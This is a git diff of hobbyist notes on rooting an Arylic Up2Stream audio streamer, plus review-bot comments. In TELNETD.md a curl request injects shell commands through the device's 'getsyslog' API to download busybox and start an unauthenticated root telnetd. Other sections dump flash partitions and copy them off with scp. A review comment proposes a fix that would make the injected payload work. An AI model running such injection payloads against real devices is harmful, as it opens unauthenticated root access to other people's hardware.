diff --git a/Hardware.md b/Hardware.md index 08e72b2..b464763 100644 --- a/Hardware.md +++ b/Hardware.md @@ -1,4 +1,4 @@ -# Hardware +# Hardware and Firmware The specs for the Linkplay A31 module are as follows ``` # cat /proc/cpuinfo @@ -29,7 +29,7 @@ https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/ The binaries are included in packages, so you have to find out which packages includes a specific binary. A list of packages can be found here: https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/Packages -Here's an example how to download a package and get the binaries from it for a SSH server (dropbear): +Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacBook: ``` cd ~/Downloads @@ -137,4 +137,23 @@ wget -O /tmp/file -T 5 'http://10.1.1.22/a31/file';/bin/chmod 777 /tmp/file # on Up2Stream device: wget -O /tmp/strings -T 5 'http://10.1.1.22/a31/strings';/bin/chmod 777 /tmp/strings +``` +Here are some code snippets from a script on the device (can't remember any details). It looks that the commands for NTP are not working anymore, also the commands to switch power for the WiFi interface off: +``` +srv=`nvram_get 2860 NTPServerIP` +sync=`nvram_get 2860 NTPSync` +tz=`nvram_get 2860 TZ` +nvram_set 2860 TZ + +nvram_set 2860 RadioOn 0 +nvram_set 2860 ApCliEnable 0 +--> blinking LED, but apcli0 and ra0 still enabled after reboot + +nvram_set 2860 TxPower 0 or 1 +--> no effect +``` +You can turn the WiFi interface and the internal access point off with the following commands: +``` +ifconfig ra0 down +ifconfig apcli0 down ``` \ No newline at end of file diff --git a/TELNETD.md b/TELNETD.md index 104394d..2aa63b5 100644 --- a/TELNETD.md +++ b/TELNETD.md 
@@ -5,23 +5,20 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacBook. ``` -curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash"; +curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash"; ``` The command above is executing the following commands on the device: ``` -wget -O /tmp/busybox -T 5 http://10.1.1.22/a31/busybox -q; -/bin/chmod 777 /tmp/busybox; -/tmp/busybox telnetd -l/bin/ash +wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/busybox -q; +chmod 777 /tmp/bin/busybox; +/tmp/bin/busybox telnetd -l/bin/ash ``` -The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. A version of busybox is provided here: - -There is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need: -https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/ - -The binaries are included in packages +The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. +A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information. 
+You may also redirect output and error output for telnetd: ``` -curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;"; +curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;"; ``` diff --git a/boot-process.md b/boot-process.md index 909ef3e..564c266 100644 --- a/boot-process.md +++ b/boot-process.md 
@@ -50,29 +50,41 @@ https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/ and https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/ - -Example to download the tools from the OpenWRT version Chaos Calmer: ------------------------------------------------ -uboot-envtools_2014.10-2_ramips_24kec.ipk - +Here's an example how to download a package from the Open WRT archive and get the binaries from it to show the environment. The commands were executed from a terminal window on my MacBook: +``` +cd ~/Downloads +curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/uboot-envtools_2014.10-2_ramips_24kec.ipk' -o uboot-envtools_2014.10-2_ramips_24kec.ipk mkdir uboot-envtools_2014.10-2_ramips_24kec cd uboot-envtools_2014.10-2_ramips_24kec tar zxpvf ../uboot-envtools_2014.10-2_ramips_24kec.ipk tar zxpvf control.tar.gz tar zxpvf data.tar.gz - -wget -O /tmp/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv';/bin/chmod 777 /tmp/fw_printenv -ln -s /tmp/fw_printenv /tmp/fw_setenv - +# copy dropbear binary to a subdirectory on your webserver +cp usr/sbin/fw_printenv /Library/WebServer/Documents/a31/ +# you may open finder to search for additional information in the package +open . +``` +In the next step you can you can download and install the tool on the Up2Stream device (telnetd already installed): +``` +cd /tmp +mkdir /tmp/bin +wget -O /tmp/bin/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv' +chmod 777 /tmp/bin/fw_printenv +ln -s /tmp/bin/fw_printenv /tmp/bin/fw_setenv +``` +and the same for dmesg: +``` +cd ~/Downloads curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/dmesg_2.25.2-4_ramips_24kec.ipk' -o dmesg_2.25.2-4_ramips_24kec.ipk mkdir dmesg_2.25.2-4_ramips_24kec cd dmesg_2.25.2-4_ramips_24kec tar zxpvf ../dmesg_2.25.2-4_ramips_24kec.ipk tar zxpvf control.tar.gz tar zxpvf data.tar.gz -open . -# copy ./usr/sbin/dmesg to your webserver, e.g. 
/Library/WebServer/Documents/a31 -on Up2Stream device: +cp ./usr/sbin/dmesg /Library/WebServer/Documents/a31 +``` +Installit on the Up2Stream device and dig for some useful information: +``` wget -O /tmp/dmesg -T 5 'http://10.1.1.22/a31/dmesg';/bin/chmod 777 /tmp/dmesg cat /proc/version 
@@ -127,41 +139,37 @@ mtd9: 00200000 00010000 "user2" [ 0.700000] 0x000000d80000-0x000000e00000 : "user" [ 0.712000] 0x000000e00000-0x000001000000 : "user2" ... +``` +Install **_dd_** from busybox and **_scp_** from dropbear package (see **_Enable Telnet_** section to install **_busybox_** and **_Hardware and Firmware_** section to install **dropbear**), then +``` +# tools included in busybox just need a symbolic link with their name +ln -s /tmp/bin/busybox /tmp/bin/dd +## copy mtd1 to a file and save for future use +dd if=/dev/mtd1 of=/tmp/mtd1.img bs=512 count=128000 skip=0 +scp -v -S /tmp/bin/dbclient /tmp/mtd1.img pi@10.1.1.40:mtd1.img +rm /tmp/mtd1.img +``` +--> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied. See **_cat /proc/mtd_** from above for details. -install dd from busybox and scp from dropbear package, then - -dd if=/dev/mtd1 of=/tmp/mtd1.cp bs=512 count=128000 skip=0 -scp -v -S /tmp/bin/dbclient /tmp/mtd1.cp pi@10.1.1.40:mtd1.cp -rm /tmp/mtd1.cp - ---> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied. - -mtd1: 00030000 00010000 "Bootloader" - no environment variables -mtd2: 00010000 00010000 "Config" - from 0x2000 to 0x6000 -mtd3: 00010000 00010000 "Factory" -mtd4: 00200000 00010000 "bkKernel" -mtd5: 001df508 00010000 "Kernel" -mtd6: 00950af8 00010000 "RootFS" -mtd7: 00b30000 00010000 "Kernel_RootFS" -mtd8: 00080000 00010000 "user" -mtd9: 00200000 00010000 "user2" - -mkdir /var/lock - -create file /etc/fw_env.config -with +Create the file **_/etc/fw_env.config_** with the following content, e.g. with vi: +``` +cat <<\EOF > /etc/fw_env.config # MTD device name Device offset Env. 
size Flash sector size /dev/mtd2 0x02000 0x4000 0x4000 - -before setting the correct values: -/tmp/fw_printenv +EOF +mkdir /var/lock +``` +Before setting the correct values for the size the following error is shown: +``` +fw_printenv Warning: Bad CRC, using default environment bootcmd=bootp; setenv bootargs root=/dev/nfs nfsroot=${serverip}:${rootpath} ip=${ipaddr}:${serverip}:${gatewayip}:${netmask}:${hostname}::off; bootm bootdelay=5 baudrate=115200 - -with settings from above: -# fw_printenv +``` +With the correct settings from above you get a list with all environment variables. These values are stored in NVRAM, so they will survive a reboot: +``` +fw_printenv WebInit=1 HostName=wiimu OperationMode=3 @@ -369,26 +377,9 @@ ApCliAuthMode=WPA2PSK ApCliEncrypType=AES ApCliChannel=6 -# show contents of NVRAM +# a similar output will provide ralink_init show 2860 - ---> similar output - -code snippet from a script: -srv=`nvram_get 2860 NTPServerIP` -sync=`nvram_get 2860 NTPSync` -tz=`nvram_get 2860 TZ` -nvram_set 2860 TZ +``` -nvram_set 2860 RadioOn 0 -nvram_set 2860 ApCliEnable 0 - ---> blinking LED, but apcli0 and ra0 still enabled after reboot - -nvram_set 2860 TxPower 0 or 1 - ---> no effect - - The environment is usually at the end of the uboot partition.
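Review bot: In the Hardware.md hunk `@@ -137,4 +137,23 @@`, the new fenced block mixes runnable commands with lines that are not commands: `nvram_set 2860 TZ` has no value, `nvram_set 2860 TxPower 0 or 1` is prose, and the `--> blinking LED ...` / `--> no effect` lines are observations. Anyone pasting the block into the telnet shell will run broken commands; prefix the observation lines with `#` and either give the two nvram_set lines concrete values or move them out of the fence. The `ifconfig ra0 down` / `ifconfig apcli0 down` commands should also say explicitly that they are runtime-only and do not survive a reboot (the paragraph above them says the nvram_set attempt did not either), and that if the telnet session arrives over one of those interfaces it is cut the moment that interface goes down. Minor: the file still ends without a trailing newline (`\ No newline at end of file`).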
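Review bot: In the TELNETD.md hunk `@@ -5,23 +5,20 @@`, the injected payload now writes to `/tmp/bin/busybox`, but nothing in the payload creates `/tmp/bin`; the `mkdir /tmp/bin` added in boot-process.md runs only after a shell already exists, so on a fresh device `wget -O /tmp/bin/busybox` fails and `telnetd` is never started. Put `mkdir+-p+/tmp/bin;` in front of the wget in the curl line. Independently of this change, both the old and the new curl lines still read `http://10.1.1.52httpapi.asp?...` with no `/` between host and path, which curl cannot resolve. The rewritten sentence "A version of busybox is provided here, but ..." still points at nothing (the old text ended in a dangling colon); add the link or path, or drop the clause. Since the page is about exposing `telnetd -l/bin/ash`, one sentence noting that this is an unauthenticated root shell reachable by anyone on the same network would be appropriate next to the command.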
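Review bot: The second TELNETD.md hunk ("You may also redirect output and error output for telnetd") has the same missing `mkdir -p /tmp/bin` as the first, and additionally assumes `/tmp/web/` exists for `/tmp/web/cmd.out` and `/tmp/web/cmd.err`; if it does not, the redirection fails and the shell never reaches telnetd. The `>` and `2>` are also sent unencoded inside the query string; if the device's HTTP parser rejects them, encode `>` as `%3E`. It is worth saying what this redirect captures: only telnetd's own stdout/stderr (startup errors), not the interactive session.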
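Review bot: In the boot-process.md hunk `@@ -50,29 +50,41 @@`, the comment `# copy dropbear binary to a subdirectory on your webserver` sits above `cp usr/sbin/fw_printenv /Library/WebServer/Documents/a31/`; it was carried over from the dropbear example in Hardware.md and should say fw_printenv. The two tools also end up in different places: fw_printenv goes to `/tmp/bin/fw_printenv` with a `mkdir /tmp/bin`, while dmesg is still fetched to `/tmp/dmesg`; pick `/tmp/bin` for both so later hunks that assume `/tmp/bin` work. Typos: "you can you can download", "Installit on the Up2Stream device", and "Open WRT" where the rest of the page writes OpenWRT. Style point for all the install lines: `chmod 777` makes the binaries world-writable; `chmod 755` is enough to execute them, and since the .ipk files are fetched and then served over plain HTTP it would be reasonable to verify a checksum of the downloaded package before copying the binary to the webserver.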
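Review bot: In the boot-process.md hunk `@@ -127,41 +139,37 @@`, the line after `ln -s /tmp/bin/busybox /tmp/bin/dd` invokes a bare `dd`, which only resolves to the new symlink if `/tmp/bin` is on PATH; otherwise the device's stripped busybox (or nothing) answers. Either call `/tmp/bin/dd if=/dev/mtd1 ...` or add `export PATH=/tmp/bin:$PATH` before it, and the same applies to `scp` if it is expected to come from the dropbear package. The `count=128000` (64 MB at bs=512) against a 0x30000-byte partition works only because dd stops at the end of the device; `count=384` (0x30000/512) or simply no `count`/`skip` says what is meant. The removed annotations `mtd1 ... "Bootloader" - no environment variables` and `mtd2 ... "Config" - from 0x2000 to 0x6000` were the only justification on the page for the `0x02000 0x4000` values in `/etc/fw_env.config`; keep them as a `#` comment inside the heredoc. With them gone, the surviving closing sentence "The environment is usually at the end of the uboot partition." now contradicts the config, which reads the environment from mtd2 ("Config") at offset 0x2000; say that on this device it lives in the Config partition rather than at the end of the bootloader. Small wording issue: the comment `# a similar output will provide` above `ralink_init show 2860` reads backwards; `# ralink_init show 2860 gives similar output` is clearer.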